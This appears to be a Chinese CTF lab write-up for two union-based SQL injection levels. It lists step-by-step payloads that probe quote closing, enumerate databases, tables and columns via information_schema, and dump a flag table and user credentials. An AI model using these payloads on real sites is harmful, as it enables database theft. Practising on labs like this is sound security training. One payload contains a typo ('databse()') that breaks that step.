第一关:
输入?id=1 正常

输入?id=1' 报错 ' .0 '

输入?id=1'--+ 正常

判断他是字符型注入 闭合方式是:
?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+

联合注入
爆出库:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+
爆出表:flag
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'--+

爆出列:id flag
?id=1' and 1=2 union select 1,2,group_concat(flag) from ctfshow.flag--+

第二关:
输入?id=1 正常

输入?id=1'报错

输入?id=1'--+ 报错

接下来查看哪些可以回显:
?id=-1 union select 1,2,3--+

查看数据库名称:
?id=-1 union select 1,databse(),3 --+

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

查看数据库中的表:
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查看表中所有字段:
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--

查看数据:
?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+



















